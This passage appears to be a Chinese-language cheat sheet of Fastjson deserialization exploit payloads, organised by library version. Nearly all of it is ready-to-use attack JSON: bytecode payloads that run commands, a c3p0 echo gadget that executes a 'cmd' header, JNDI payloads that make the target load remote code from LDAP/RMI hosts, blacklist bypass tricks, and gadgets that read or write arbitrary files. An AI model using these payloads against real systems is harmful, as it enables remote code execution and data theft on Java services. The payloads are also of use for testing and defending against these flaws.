G$bb$n$b4$e306$n87ドル$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC77ドルe$c0VP$a9x80ドル$k$fc$K$j$bfa3ドルb7ドルe$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a588ドル7ドルb$d8$V$ec$c793ドル$U$edY$c4$k$S$b8M$c1S$K9ドルeVp$a8$$$c3M$b87ドルfF$n$i$da$k$c293ドルs$a3$e0993ドルd87ドルk$pv$e4$l3ドルeQL40ドルE$J$A$A" } } : "xxx" } }
1.2.33<=fastjson<=12.36
{
"name":
{
"@type" : "java.lang.Class",
"val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
},
"x" : {
"name": {
"@type" : "java.lang.Class",
"val" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
{
"@type":"com.alibaba.fastjson.JSONObject",
"c": {
"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName":"$$BCEL..."
}
} : "ddd"
}
}1.2.37<=fastjson<=1.2.47
{
"name":
{
"@type" : "java.lang.Class",
"val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
},
"x" : {
"name": {
"@type" : "java.lang.Class",
"val" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"y": {
"@type":"com.alibaba.fastjson.JSONObject",
"c": {
"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName":"$$BCEL$..",
"$ref": "$.x.y.c.connection"
}
}
}
}其他
{
"@type": "org.apache.ibatis.datasource.unpooled.UnpooledDataSource",
"key": {
"@type": "java.lang.Class",
"val": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driver": "$$BCEL$$xxxxxxx"
}利用条件苛刻,可用于解决不出网利用。
需要调用parseObject()方法时,加入Feature.SupportNonPublicField参数。
_bytecodes要进行base64编码
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQAJgoABwAXCgAYABkIABoKABgAGwcAHAoABQAXBwAdAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHAB4BAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAfAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYHACABAApTb3VyY2VGaWxlAQALVEVNUE9DLmphdmEMAAgACQcAIQwAIgAjAQASb3BlbiAtYSBDYWxjdWxhdG9yDAAkACUBAAZURU1QT0MBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAHAAAAAAAEAAEACAAJAAIACgAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQALAAAADgADAAAACwAEAAwADQANAAwAAAAEAAEADQABAA4ADwABAAoAAAAZAAAABAAAAAGxAAAAAQALAAAABgABAAAAEQABAA4AEAACAAoAAAAZAAAAAwAAAAGxAAAAAQALAAAABgABAAAAFgAMAAAABAABABEACQASABMAAgAKAAAAJQACAAIAAAAJuwAFWbcABkyxAAAAAQALAAAACgACAAAAGQAIABoADAAAAAQAAQAUAAEAFQAAAAIAFg=="],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}可用于解决不出网利用。
fastjson <1.2.47
利用c3p0二次反序列化 cc payload到达回显。
POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/json Content-Length: 8925 {"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000103F400000000000027372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870707400136765744F757470757450726F7065727469657370737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017371007E000B3F4000000000000C770800000010000000017372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00084C00055F6E616D6571007E00074C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000DCFCAFEBABE0000003400CD0A0014005F090033006009003300610700620A0004005F09003300630A006400650A003300660A000400670A000400680A0033006907006A0A0014006B0A0012006C08006D0B000C006E08006F0700700A001200710700720A007300740700750700760700770800780A0079007A0A0018007B08007C0A0018007D08007E08007F0800800B001600810700820A008300840A008300850A008600870A002200880800890A0022008A0A0022008B0A008C008D0A008C008E0A0012008F0A009000910A009000920A001200930A003300940700950A00120096070097010001680100134C6A6176612F7574696C2F486173685365743B0100095369676E61747572650100274C6A6176612F7574696C2F486173685365743C4C6A6176612F6C616E672F4F626A6563743B3E3B010001720100274C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B010001700100284C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100204C79736F73657269616C2F7061796C6F6164732F436F6D6D6F6E4563686F313B01000169010015284C6A6176612F6C616E672F4F626A6563743B295A0100036F626A0100124C6A6176612F6C616E672F4F626A6563743B01000D537461636B4D61705461626C65010016284C6A6176612F6C616E672F4F626A6563743B492956010001650100154C6A6176612F6C616E672F457863657074696F6E3B010008636F6D6D616E64730100135B4C6A6176612F6C616E672F537472696E673B0100016F01000564657074680100014907007607004C070072010001460100017101000D6465636C617265644669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000573746172740100016E0100114C6A6176612F6C616E672F436C6173733B07007007009807009901000A536F7572636546696C65010010436F6D6D6F6E4563686F312E6A6176610C003C003D0C003800390C003A003B0100116A6176612F7574696C2F486173685365740C0034003507009A0C009B009C0C005300480C009D00440C009E00440C004300440100256A617661782F736572766C65742F687474702F48747470536572766C6574526571756573740C009F00A00C00A100A2010003636D640C00A300A401000B676574526573706F6E736501000F6A6176612F6C616E672F436C6173730C00A500A60100106A6176612F6C616E672F4F626A6563740700A70C00A800A90100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73650100136A6176612F6C616E672F457863657074696F6E0100106A6176612F6C616E672F537472696E670100076F732E6E616D650700AA0C00AB00A40C00AC00AD01000357494E0C009D00AE0100022F630100072F62696E2F73680100022D630C00AF00B00100116A6176612F7574696C2F5363616E6E65720700B10C00B200B30C00B400B50700B60C00B700B80C003C00B90100025C410C00BA00BB0C00BC00AD0700BD0C00BE00BF0C00C0003D0C00C100C20700990C00C300C40C00C500C60C00C700C80C003A00480100135B4C6A6176612F6C616E672F4F626A6563743B0C00C900A001001E79736F73657269616C2F7061796C6F6164732F436F6D6D6F6E4563686F3101001A5B4C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C640100106A6176612F6C616E672F54687265616401000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B010008636F6E7461696E73010003616464010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B010010697341737369676E61626C6546726F6D010014284C6A6176612F6C616E672F436C6173733B295A010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100186A6176612F6C616E672F7265666C6563742F4D6574686F64010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01000B67657450726F706572747901000B746F55707065724361736501001428294C6A6176612F6C616E672F537472696E673B01001B284C6A6176612F6C616E672F4368617253657175656E63653B295A01000967657457726974657201001728294C6A6176612F696F2F5072696E745772697465723B0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B010018284C6A6176612F696F2F496E70757453747265616D3B295601000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0100046E6578740100136A6176612F696F2F5072696E745772697465720100077072696E746C6E010015284C6A6176612F6C616E672F537472696E673B2956010005666C7573680100116765744465636C617265644669656C647301001C28295B4C6A6176612F6C616E672F7265666C6563742F4669656C643B01000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100076973417272617901000328295A01000D6765745375706572636C617373010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740700CA0A00CB005F0021003300CB000000030008003400350001003600000002003700080038003900000008003A003B000000040001003C003D0001003E0000005C000200010000001E2AB700CC01B3000201B30003BB000459B70005B30006B8000703B80008B100000002003F0000001A0006000000140004001500080016000C001700160018001D001900400000000C00010000001E004100420000000A004300440001003E0000005A000200010000001A2AC6000DB200062AB6000999000504ACB200062AB6000A5703AC00000003003F0000001200040000001D000E001E001000210018002200400000000C00010000001A00450046000000470000000400020E01000A003A00480001003E000001D300050003000000EF1B1034A3000FB20002C6000AB20003C60004B12AB8000B9A00D7B20002C70051120C2AB6000DB6000E9900452AC0000CB30002B20002120FB900100200C7000A01B30002A7002AB20002B6000D121103BD0012B60013B2000203BD0014B60015C00016B30003A700084D01B30002B20002C60076B20003C6007006BD00184D1219B8001AB6001B121CB6001D9900102C03120F532C04121E53A7000D2C03121F532C041220532C05B20002120FB90010020053B20003B900210100BB002259B800232CB60024B60025B700261227B60028B60029B6002AB20003B900210100B6002BA700044DB12A1B0460B80008B100020047006600690017007A00E200E500170003003F0000006A001A000000250012002600130028001A0029002C002A0033002B0040002C0047002F0066003300690031006A0032006E0037007A003A007F003B008F003C0094003D009C003F00A1004000A6004200B3004400D7004500E2004700E5004600E6004800E7004B00EE004D00400000002A0004006A00040049004A0002007F0063004B004C0002000000EF004D00460000000000EF004E004F0001004700000022000B1200336107005004FC002D07005109FF003E0002070052010001070050000006000A005300480001003E000001580002000C000000842AB6000D4D2CB6002C4E2DBE360403360515051504A200652D1505323A06190604B6002D013A0719062AB6002E3A071907B6000DB6002F9A000C19071BB80030A7002F1907C00031C000313A081908BE360903360A150A1509A200161908150A323A0B190B1BB80030840A01A7FFE9A700053A08840501A7FF9A2CB60032594DC7FF85B100010027006F007200170003003F0000004200100000005000050052001E00530024005400270056002F0058003A00590043005B0063005C0069005B006F00620072006100740052007A0065007B00660083006800400000003E00060063000600540046000B0027004D004D00460007001E00560055005600060000008400570046000000000084004E004F00010005007F00580059000200470000002E0008FC000507005AFE000B07005B0101FD003107005C070052FE00110700310101F8001942070050F90001F800050001005D00000002005E707400016170770100787400017878737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000000787871007E000D78;"}}
1.2.25后将TypeUtils.loadClass替换为checkAutoType()函数,增加了黑名单和白名单。
把autoTypeSupport默认为False。
当autoTypeSupport为False时,先黑名单过滤,再白名单过滤,若白名单匹配上则直接加载该类,否则报错。
当autoTypeSupport为True时,先白名单过滤,匹配成功即可加载该类,否则再黑名单过滤。
1.2.25黑名单
bsh com.mchange com.sun. java.lang.Thread java.net.Socket java.rmi javax.xml org.apache.bcel org.apache.commons.beanutils org.apache.commons.collections.Transformer org.apache.commons.collections.functors org.apache.commons.collections4.comparators org.apache.commons.fileupload org.apache.myfaces.context.servlet org.apache.tomcat org.apache.wicket.util org.codehaus.groovy.runtime org.hibernate org.jboss org.mozilla.javascript org.python.core org.springframework
exp
条件需要开启autotype
类名前面加了一个L,后面加一个;可以绕过黑名单
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://localhost:1389/badNameClass", "autoCommit":true}从1.2.42版本开始,把之前的明文黑名单,改为hash黑名单。
如下大佬整理的
https://github.com/LeadroyaL/fastjson-blacklist
exp
条件需要开启autotype
双写绕过
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1389/badNameClass", "autoCommit":true}exp
条件需要开启autotype
加[{绕过
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1389/badNameClass", "autoCommit":true}条件需要开启autotype
45把之前问题修了,但是可以借助第三方组件绕过。
需要mybatis,且版本需为3.x.x系列<3.5.0的版本。
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/badNameClass"}}借助缓存进行通杀,缓存在1.2.48被改为默认关闭
漏洞原理是通过java.lang.Class,将JdbcRowSetImpl类加载到Map中缓存,从而绕过AutoType的检测
这里有两大版本范围:
- 1.2.25-1.2.32版本:未开启AutoTypeSupport时能成功利用,开启AutoTypeSupport不能利用
- 1.2.33-1.2.47版本:无论是否开启AutoTypeSupport,都能成功利用
poc:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://localhost:1389/badNameClass",
"autoCommit":true
}
}1.2.48之后版本,小弟水平有限还未复现研究,payload需要注意的细节还未探索
正则表达式拒绝服务漏洞
{
"regex":{
"$ref":"$[\blue = /\^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$/]"
},
"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
}
{
"regex":{
"$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"
},
"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
}
需要开启AutoType
{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}无需开启 autoType:
{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"rmi://10.10.20.166:1099/ExportObject"}
{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://10.10.20.166:1389/ExportObject"}{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://localhost:1389/Exploit","Object":"a"}- 需要开启AutoType;
- Fastjson <= 1.2.62;
- JNDI注入利用所受的JDK版本限制;
- 目标服务端需要存在xbean-reflect包;
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}
{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor", "parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://localhost:1389/Exploit"}, "namespace":""}- 开启AutoType;
- Fastjson <= 1.2.66;
- JNDI注入利用所受的JDK版本限制;
- org.apache.shiro.jndi.JndiObjectFactory类需要shiro-core包;
- br.com.anteros.dbcp.AnterosDBCPConfig类需要Anteros-Core和Anteros-DBCP包;
- com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig类需要ibatis-sqlmap和jta包;
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":["ldap://localhost:1389/Exploit"], "Realms":[""]}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}适用于jdk11以上版本的写文件的payload:
{
"@type": "java.lang.AutoCloseable",
"@type": "sun.rmi.server.MarshalOutputStream",
"out": {
"@type": "java.util.zip.InflaterOutputStream",
"out": {
"@type": "java.io.FileOutputStream",
"file": "/tmp/asdasd",
"append": true
},
"infl": {
"input": {
"array": "eJxLLE5JTCkGAAh5AnE=",
"limit": 14
}
},
"bufLen": "100"
},
"protocolVersion": 1
}- 开启AutoType;
- Fastjson <= 1.2.67;
- JNDI注入利用所受的JDK版本限制;
- org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup类需要ignite-core、ignite-jta和jta依赖;
- org.apache.shiro.jndi.JndiObjectFactory类需要shiro-core和slf4j-api依赖;
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", "jndiNames":["ldap://localhost:1389/Exploit"], "tm": {"$ref":"$.tm"}}
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://localhost:1389/Exploit","instance":{"$ref":"$.instance"}}
- Fastjson <= 1.2.68;
- 利用类必须是expectClass类的子类或实现类,并且不在黑名单中;
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.caucho.config.types.ResourceRef","lookupName": "ldap://localhost:1389/Exploit", "value": {"$ref":"$.value"}}无需开启AutoType,直接成功绕过CheckAutoType()的检测从而触发执行:
{"@type":"java.lang.AutoCloseable","@type":"vul.VulAutoCloseable","cmd":"calc"}读文件
{"@type":"java.lang.AutoCloseable", "@type":"org.eclipse.core.internal.localstore.SafeFileOutputStream", "tempPath":"C:/Windows/win.ini", "targetPath":"D:/wamp64/www/win.txt"}写文件
{
"@type": "java.lang.AutoCloseable",
"@type": "java.io.FileOutputStream",
"file": "/tmp/nonexist",
"append": "false"
}{
"@type": "java.lang.AutoCloseable",
"@type": "java.io.FileWriter",
"file": "/tmp/nonexist",
"append": "false"
}写文件
{
"stream": {
"@type": "java.lang.AutoCloseable",
"@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",
"targetPath": "D:/wamp64/www/hacked.txt",
"tempPath": "D:/wamp64/www/test.txt"
},
"writer": {
"@type": "java.lang.AutoCloseable",
"@type": "com.esotericsoftware.kryo.io.Output",
"buffer": "cHduZWQ=",
"outputStream": {
"$ref": "$.stream"
},
"position": 5
},
"close": {
"@type": "java.lang.AutoCloseable",
"@type": "com.sleepycat.bind.serial.SerialOutput",
"out": {
"$ref": "$.writer"
}
}
}写文件
{
'stream':
{
'@type':"java.lang.AutoCloseable",
'@type':'java.io.FileOutputStream',
'file':'/tmp/nonexist',
'append':false
},
'writer':
{
'@type':"java.lang.AutoCloseable",
'@type':'org.apache.solr.common.util.FastOutputStream',
'tempBuffer':'SSBqdXN0IHdhbnQgdG8gcHJvdmUgdGhhdCBJIGNhbiBkbyBpdC4=',
'sink':
{
'$ref':'$.stream'
},
'start':38
},
'close':
{
'@type':"java.lang.AutoCloseable",
'@type':'org.iq80.snappy.SnappyOutputStream',
'out':
{
'$ref':'$.writer'
}
}
}适用于jdk8/10的
{
"@type": "java.lang.AutoCloseable",
"@type": "sun.rmi.server.MarshalOutputStream",
"out": {
"@type": "java.util.zip.InflaterOutputStream",
"out": {
"@type": "java.io.FileOutputStream",
"file": "dst",
"append": "false"
},
"infl": {
"input": "eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=="
},
"bufLen": 1048576
},
"protocolVersion": 1
}jdk 8
- position写入的长度,必须和base64编码前的长度一致。
{
"stream": {
"@type": "java.lang.AutoCloseable",
"@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",
"targetPath": "f:/pwn.txt",
"tempPath": ""
},
"writer": {
"@type": "java.lang.AutoCloseable",
"@type": "com.esotericsoftware.kryo.io.Output",
"buffer": "YjF1M3I=",
"outputStream": {
"$ref": "$.stream"
},
"position": 5
},
"close": {
"@type": "java.lang.AutoCloseable",
"@type": "com.sleepycat.bind.serial.SerialOutput",
"out": {
"$ref": "$.writer"
}
}
}2021黑帽大会腾讯玄武披露
详细漏洞原理待研究
https://b1ue.cn/archives/506.html
Mysqlconnector 5.1.x {"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"mysql.host","portToConnectTo":3306,"info":{"user":"user","password":"pass","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","NUM_HOSTS": "1"},"databaseToConnectTo":"dbname","url":""} Mysqlconnector 6.0.2 or 6.0.3 {"@type": "java.lang.AutoCloseable","@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection","proxy":{"connectionString":{"url": "jdbc:mysql://localhost:3306/foo?allowLoadLocalInfile=true"}}} Mysqlconnector 6.x or < 8.0.20 {"@type":"java.lang.AutoCloseable","@type":"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection","proxy":{"@type":"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy","connectionUrl":{"@type":"com.mysql.cj.conf.url.ReplicationConnectionUrl", "masters": [{"host":"mysql.host"}], "slaves":[], "properties":{"host":"mysql.host","user":"user","dbname":"dbname","password":"pass","queryInterceptors":"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"}}}}
待探索
{"@type":"org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory", "tmJndiName": "ldap://localhost:1389/Exploit", "tmFromJndi": true, "transactionManager": {"$ref":"$.transactionManager"}}
{"@type":"org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory", "tmJndiName": "ldap://localhost:1389/Exploit", "tmFromJndi": true, "transactionManager": {"$ref":"$.transactionManager"}}文章推荐:https://www.sec-in.com/article/950
Fastjson默认会去除键、值外的空格、\b、\n、\r、\f等,同时还会自动将键与值进行unicode与十六进制解码。
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{ "@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{/*s6*/"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{\n"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"@type"\b:"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true} {"\x40\x74\x79\x70\x65":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}